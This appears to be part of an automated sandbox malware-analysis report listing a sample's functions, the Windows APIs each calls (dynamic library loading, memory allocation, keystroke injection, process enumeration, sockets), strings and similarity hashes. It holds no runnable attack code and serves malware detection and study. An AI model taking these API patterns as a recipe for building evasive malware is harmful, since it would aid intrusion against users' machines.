Opcode Fuzzy Hash: 5efa20a2781ffd2f15284b542ac286f61dc49337e4bac04f0d167d94acc8a7ad
Instruction Fuzzy Hash: E2D08C31600326DFC3204B70D808243B2E5AF04342F918C3E9882D2251E6B8DCA4C608

Function 004190E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00418CF4,?,0042F910), ref: 004190EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00419100

Strings

kernel32.dll, xrefs: 004190E9
GetModuleHandleExW, xrefs: 004190FA

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: ef20d196069e9906003bf3ddd82e116e7c42fb62d33038211c6261ea1e250103
Instruction ID: baaa3439bf51e580945773a8cacfe7b9df152b434ed005eb026c0ff81fac37c9
Opcode Fuzzy Hash: ef20d196069e9906003bf3ddd82e116e7c42fb62d33038211c6261ea1e250103
Instruction Fuzzy Hash: 4AD0C230610323EFD7208F30D81824376E5AF04341B95883FD481D2650EA78CCC4C658

Function 003E1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 003E1718
__swprintf.LIBCMT ref: 003E1749

Strings

WIN_XPe, xrefs: 003E1788
%.3d, xrefs: 003E1723

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 2bd25ff701716549411d7c7322f037d2cb1fcc4f20545aa9d7c8711109341a34
Instruction ID: c8aafbb94dd2660670164c1167f8ad0a0dd81df355f263f93294a7060e96a964
Opcode Fuzzy Hash: 2bd25ff701716549411d7c7322f037d2cb1fcc4f20545aa9d7c8711109341a34
Instruction Fuzzy Hash: 3CD01272804178FAC71697919888DFD777CA709702F541662B402D2580E2359B94E625

Function 003F717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acdbad2dc6a5271726b9d581428161de57ceee013aeb6d855f91fd439fc72641
Instruction ID: 79c1a38f736626dc4d962426b85c79b72ae47a51b605c97491268f56860deafd
Opcode Fuzzy Hash: acdbad2dc6a5271726b9d581428161de57ceee013aeb6d855f91fd439fc72641
Instruction Fuzzy Hash: 0DC18E74A0421AEFCB15CFA8C884EBEBBB5FF48304B158599E905EB251D730ED81DB90

Function 0041E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0041E0BE
CharLowerBuffW.USER32(?,?), ref: 0041E101

Part of subcall function 0041D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0041D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0041E301
_memmove.LIBCMT ref: 0041E314

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 6acf87980206f08e684c8ceadd872bab6e13ab4564fda63d9a02a4c66c1c0f41
Instruction ID: 032e8da2d84ddf9d551744db7c54259f3c0d6748059a9a948f7450246a493649
Opcode Fuzzy Hash: 6acf87980206f08e684c8ceadd872bab6e13ab4564fda63d9a02a4c66c1c0f41
Instruction Fuzzy Hash: 02C157756083019FC705DF29C480AAABBE4FF89314F04896EF899DB351D734E986CB86

Function 00418093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004180C3
CoUninitialize.OLE32 ref: 004180CE

Part of subcall function 003FD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003FD5D4

VariantInit.OLEAUT32(?), ref: 004180D9
VariantClear.OLEAUT32(?), ref: 004183AA

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 7d8f9094a39af9af8a511b9f1403c0c36a1bd9ab900017f6b1355b52534d9801
Instruction ID: b8fc69d12319317ebf50ad79a26f2c399d34198685be9422bf1f485e434d6c27
Opcode Fuzzy Hash: 7d8f9094a39af9af8a511b9f1403c0c36a1bd9ab900017f6b1355b52534d9801
Instruction Fuzzy Hash: 37A134356047059FCB01DF24C885B6AB7E4BF8A354F04445EF99AAB3A1CB38ED45CB86

Function 003F687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003F688E
SysAllocString.OLEAUT32(00000000), ref: 003F6937
VariantCopy.OLEAUT32 ref: 003F6966
VariantClear.OLEAUT32(?), ref: 003F698D

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 895d3750a7a3f2003d09ac1e844cbc321d8ae6135329dd32552dd4303d3f609d
Instruction ID: 2555fd141e3e4771fd4f6ba1e725fcedb7bfc4169f8d7ce3abb748734da0de18
Opcode Fuzzy Hash: 895d3750a7a3f2003d09ac1e844cbc321d8ae6135329dd32552dd4303d3f609d
Instruction Fuzzy Hash: 6351E6B4700349DADF25AF65C892A3AB3E8EF55310F20C82FE686EB691DB74D8408714

Function 004297F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00DEE9C0,?), ref: 00429863
ScreenToClient.USER32(00000002,00000002), ref: 00429896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00429903

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 0bf849bef042c55e1eeac90702c68fc3390c40e4b37690914cbccda510202a98
Instruction ID: d090d188afa6a3489b8859c797f68c892f931c36df6ca0711dc488c14afc7a97
Opcode Fuzzy Hash: 0bf849bef042c55e1eeac90702c68fc3390c40e4b37690914cbccda510202a98
Instruction Fuzzy Hash: 6F515E74A00218AFCB10DF58D880AAE7BB5FF45360F94816AF8559B3A0D734AD81CB94

Function 003F9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 003F9AD2
__itow.LIBCMT ref: 003F9B03

Part of subcall function 003F9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 003F9DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 003F9B6C
__itow.LIBCMT ref: 003F9BC3

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 6b96458dccd9cc155ec7c3752a35a16d82ad807cb6c39b7509e768d09f65e605
Instruction ID: 4325776755b2822378d97d0c65048d435e5ca8c676221bd34de10e02c15acf10
Opcode Fuzzy Hash: 6b96458dccd9cc155ec7c3752a35a16d82ad807cb6c39b7509e768d09f65e605
Instruction Fuzzy Hash: C9415074A0020CABDF26EF54D885BFE7BB9EF45710F40006AFA05AB291DB709D45CBA1

Function 004169AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 004169D1
WSAGetLastError.WSOCK32(00000000), ref: 004169E1

Part of subcall function 003A9837: __itow.LIBCMT ref: 003A9862
Part of subcall function 003A9837: __swprintf.LIBCMT ref: 003A98AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00416A45
WSAGetLastError.WSOCK32(00000000), ref: 00416A51

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: cd96d7446bfa27fe7472680e2731f3f4e41ffeb7e7b0e8e34bdb04cfb054f48a
Instruction ID: 7b0c9dfe12014b1207ab78ec6ec902133b0ee15714231d15f6840625c6b40e5e
Opcode Fuzzy Hash: cd96d7446bfa27fe7472680e2731f3f4e41ffeb7e7b0e8e34bdb04cfb054f48a
Instruction Fuzzy Hash: FF41C2747002006FEB22AF24CC86F7A77E8DF16B10F448029FA19AF3C2DA749D018795

Function 0041641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0042F910), ref: 004164A7
_strlen.LIBCMT ref: 004164D9

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: a2fcc9d001cd2a3cf932f0331a136910ab33057b8cee0b46cad23288284b82a8
Instruction ID: 38e73bae8be3eca6f90172138bdb150aa6267d88704044b99b9c0f8a25098062
Opcode Fuzzy Hash: a2fcc9d001cd2a3cf932f0331a136910ab33057b8cee0b46cad23288284b82a8
Instruction Fuzzy Hash: 8541D531600104ABCB15EBA8EC85FFEB7B9EF05310F11816AF819AB292DB34ED45CB54

Function 0040B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0040B89E
GetLastError.KERNEL32(?,00000000), ref: 0040B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0040B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0040B915

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 5ab1de6d5009de531132de11eb5c205b2139766b3642f4ad38034f4dfcac4c93
Instruction ID: 76e21969835ff419b7876eedeb82a152293b3f6557789b9dc5d49250b86f0ddb
Opcode Fuzzy Hash: 5ab1de6d5009de531132de11eb5c205b2139766b3642f4ad38034f4dfcac4c93
Instruction Fuzzy Hash: C7412C39600610DFCB11EF15C444A5ABBE5EF4A710F0580AAED4AAF362CB38FD01CB95

Function 00428851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004288DE

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 81af14a07ea2b9aa08ca7bca64d2b5341397c9b43ee7956b3d970fbf6471aa3d
Instruction ID: d76e879ced5e662dee156c4fa8b6a0960fc5ad30d30dc94d3b259bbcf5d75736
Opcode Fuzzy Hash: 81af14a07ea2b9aa08ca7bca64d2b5341397c9b43ee7956b3d970fbf6471aa3d
Instruction Fuzzy Hash: 8C311674702128AFEB20AA18EC45FBE3760EB09310FD4412BF511E62A1CE78D991DB5F

Function 0042AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0042AB60
GetWindowRect.USER32(?,?), ref: 0042ABD6
PtInRect.USER32(?,?,0042C014), ref: 0042ABE6
MessageBeep.USER32(00000000), ref: 0042AC57

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: eab07baf28c7d334e6316e7108a34df685625485b36ceae2decfac84042d4940
Instruction ID: 77d413c5f648399ef183ead41f38ea062ce163df038dec2fc850ca122fa3b330
Opcode Fuzzy Hash: eab07baf28c7d334e6316e7108a34df685625485b36ceae2decfac84042d4940
Instruction Fuzzy Hash: 7C41A130700129DFCB21DF59E884A59BBF1FB44310F9880BAE9149B364D734A861CB9A

Function 00400AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00400B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00400B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00400BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00400BFB

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 33b2e180a4533c6a53f0ed9185489729ea33be1282ea45486ed94821a9881e05
Instruction ID: 760d895e435dd124f6fd2d13ff075f8a17f1888779cebcdd07cb7e0ca908e4a0
Opcode Fuzzy Hash: 33b2e180a4533c6a53f0ed9185489729ea33be1282ea45486ed94821a9881e05
Instruction Fuzzy Hash: 12316D30E402086EFB318BA58C05BFBBBB5AB45314F48437BE591712D1C3BCA9459759

Function 00400C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00400C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00400C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00400CE1
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00400D33

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: faa19b51f23fbca0ef7d63f86aa62c0a230ac96f5f978155c98113fafe689899
Instruction ID: f16b2a3043aa276f22ff3cb483583b2e4216a7eadd4353940460041b5fd202f7
Opcode Fuzzy Hash: faa19b51f23fbca0ef7d63f86aa62c0a230ac96f5f978155c98113fafe689899
Instruction Fuzzy Hash: DB314630A042586EFF398B658814BFFBB76AF45310F44433BE481722D1C37D9986976A

Function 003D61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003D61FB
__isleadbyte_l.LIBCMT ref: 003D6229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003D6257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003D628D

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: f227ad562cb3134cad8dd522e66e97c432ad3b43744f217cff8fd14a53c2b242
Instruction ID: 2f2a2c11c0653b52c904c11674a2f43bccca1cef07d1aab88b8aaa64f4808207
Opcode Fuzzy Hash: f227ad562cb3134cad8dd522e66e97c432ad3b43744f217cff8fd14a53c2b242
Instruction Fuzzy Hash: 1231A132604246AFDF228F65EC46BBA7BB9FF41310F16442AE8749B291D731DD50D790

Function 00424EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00424F02

Part of subcall function 00403641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040365B
Part of subcall function 00403641: GetCurrentThreadId.KERNEL32 ref: 00403662
Part of subcall function 00403641: AttachThreadInput.USER32(00000000,?,00405005), ref: 00403669

GetCaretPos.USER32(?), ref: 00424F13
ClientToScreen.USER32(00000000,?), ref: 00424F4E
GetForegroundWindow.USER32 ref: 00424F54

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 9370ebd564013d32524bdf6f98d7b2b49d8b5d2329370b354ad2b3562e9c9087
Instruction ID: b7734e96e6c381c2728287da344e4571cb42a0bf13e05ad569c0dd970e41a5ae
Opcode Fuzzy Hash: 9370ebd564013d32524bdf6f98d7b2b49d8b5d2329370b354ad2b3562e9c9087
Instruction Fuzzy Hash: 46314B71E00108AFCB10EFA5C985AEFB7FDEF89300F40446AE815E7241DA75AE458BA4

Function 00403C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00403C7A
Process32FirstW.KERNEL32(00000000,?), ref: 00403C88
Process32NextW.KERNEL32(00000000,?), ref: 00403CA8
CloseHandle.KERNEL32(00000000), ref: 00403D52

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 5aa641a3904a8a7c4e4a87f05fd160a5f58bf49e6142d4444d3a772c338346f3
Instruction ID: a637fa4a48a41dfe0d706f10f4cac28e339e2a58a069587c4999f2bfc8beaf34
Opcode Fuzzy Hash: 5aa641a3904a8a7c4e4a87f05fd160a5f58bf49e6142d4444d3a772c338346f3
Instruction Fuzzy Hash: 1F31A2711083059FD315EF50C881ABFBBF8EF96354F90093DF4819A2A1EB759A49CB92

Function 0042C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

